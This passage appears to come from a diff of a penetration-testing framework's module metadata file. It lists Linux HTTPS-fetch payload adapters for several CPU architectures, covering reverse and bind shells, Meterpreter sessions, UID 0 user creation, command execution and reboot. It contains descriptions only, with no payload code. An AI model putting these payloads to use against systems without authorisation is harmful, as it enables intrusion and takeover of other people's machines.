"rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/aarch64/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/aarch64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/aarch64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/aarch64/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/aarch64/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\ndup2 socket in x12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/aarch64/shell", - "stager_refname": "linux/aarch64/reverse_tcp" - }, - "payload_cmd/linux/https/aarch64/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/aarch64/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre" - ], - "description": "Fetch and execute an AARCH64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/aarch64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/aarch64/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/aarch64", - "adapted_refname": "linux/aarch64/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/armbe/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/armbe/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/armbe/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/armbe/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline", - "fullname": "payload/cmd/linux/https/armbe/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Balazs Bucsay @xoreipeip " - ], - "description": "Fetch and execute an ARMBE payload from an HTTPS server.\nListen for a connection and spawn a command shell", - "references": [ - "URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armbe/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armbe", - "adapted_refname": "linux/armbe/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/armle/adduser": { - "name": "HTTPS Fetch, Linux Add User", - "fullname": "payload/cmd/linux/https/armle/adduser", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nCreate a new user with UID 0", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/adduser", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/adduser", - "staged": false - }, - "payload_cmd/linux/https/armle/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/armle/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Jonathan Salwan" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nExecute an arbitrary command", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/exec", - "staged": false - }, - "payload_cmd/linux/https/armle/meterpreter/bind_tcp": { - "name": "HTTPS Fetch, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/armle/meterpreter/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/https/armle/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/armle/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/meterpreter", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/https/armle/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/armle/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/armle/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/armle/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/armle/shell/bind_tcp": { - "name": "HTTPS Fetch, Linux dup2 Command Shell, Bind TCP Stager", - "fullname": "payload/cmd/linux/https/armle/shell/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo " - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nListen for a connection", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/shell/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell/bind_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/bind_tcp" - }, - "payload_cmd/linux/https/armle/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux dup2 Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/armle/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "nemo ", - "tkmru" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\ndup2 socket in r12, then execve.\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell/reverse_tcp", - "staged": true, - "stage_refname": "linux/armle/shell", - "stager_refname": "linux/armle/reverse_tcp" - }, - "payload_cmd/linux/https/armle/shell_bind_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/armle/shell_bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ", - "hal" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect to target and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/shell_bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell_bind_tcp", - "staged": false - }, - "payload_cmd/linux/https/armle/shell_reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Inline", - "fullname": "payload/cmd/linux/https/armle/shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "civ" - ], - "description": "Fetch and execute an ARMLE payload from an HTTPS server.\nConnect back to attacker and spawn a command shell", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/armle.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/armle/shell_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/armle", - "adapted_refname": "linux/armle/shell_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mips64/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/mips64/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/mips64/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mips64/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPS64 payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2023-06-09 16:47:45 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mips64.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mips64/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mips64", - "adapted_refname": "linux/mips64/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/exec": { - "name": "HTTPS Fetch, Linux Execute Command", - "fullname": "payload/cmd/linux/https/mipsbe/exec", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "entropy " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for executing commands.\n This module is sometimes helpful for testing purposes.", - "references": [ - "EDB-17940" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/exec", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/meterpreter/reverse_tcp": { - "name": "HTTPS Fetch, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter/reverse_tcp", - "staged": true, - "stage_refname": "linux/mipsbe/meterpreter", - "stager_refname": "linux/mipsbe/reverse_tcp" - }, - "payload_cmd/linux/https/mipsbe/meterpreter_reverse_http": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_http", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/meterpreter_reverse_https": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_https", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/meterpreter_reverse_tcp": { - "name": "HTTPS Fetch", - "fullname": "payload/cmd/linux/https/mipsbe/meterpreter_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Adam Cammack ", - "Brent Cook ", - "timwr" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/meterpreter_reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/meterpreter_reverse_tcp", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/reboot": { - "name": "HTTPS Fetch, Linux Reboot", - "fullname": "payload/cmd/linux/https/mipsbe/reboot", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "Michael Messner ", - "rigan - " - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\n\n A very small shellcode for rebooting the system.\n This payload is sometimes helpful for testing purposes or executing\n other payloads that rely on initial startup procedures.", - "references": [ - "URL-http://www.shell-storm.org/shellcode/files/shellcode-795.php" - ], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": "/modules/payloads/adapters/cmd/linux/https/mipsbe.rb", - "is_install_path": true, - "ref_name": "cmd/linux/https/mipsbe/reboot", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 8, - "adapter_refname": "cmd/linux/https/mipsbe", - "adapted_refname": "linux/mipsbe/reboot", - "staged": false - }, - "payload_cmd/linux/https/mipsbe/shell/reverse_tcp": { - "name": "HTTPS Fetch, Linux Command Shell, Reverse TCP Stager", - "fullname": "payload/cmd/linux/https/mipsbe/shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Brendan Watters", - "Spencer McIntyre", - "juan vazquez ", - "tkmru" - ], - "description": "Fetch and execute an MIPSBE payload from an HTTPS server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", - "references": [], - "platform": "Linux", - "arch": "cmd", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-01-30 13:51:05 +0000", - "path": 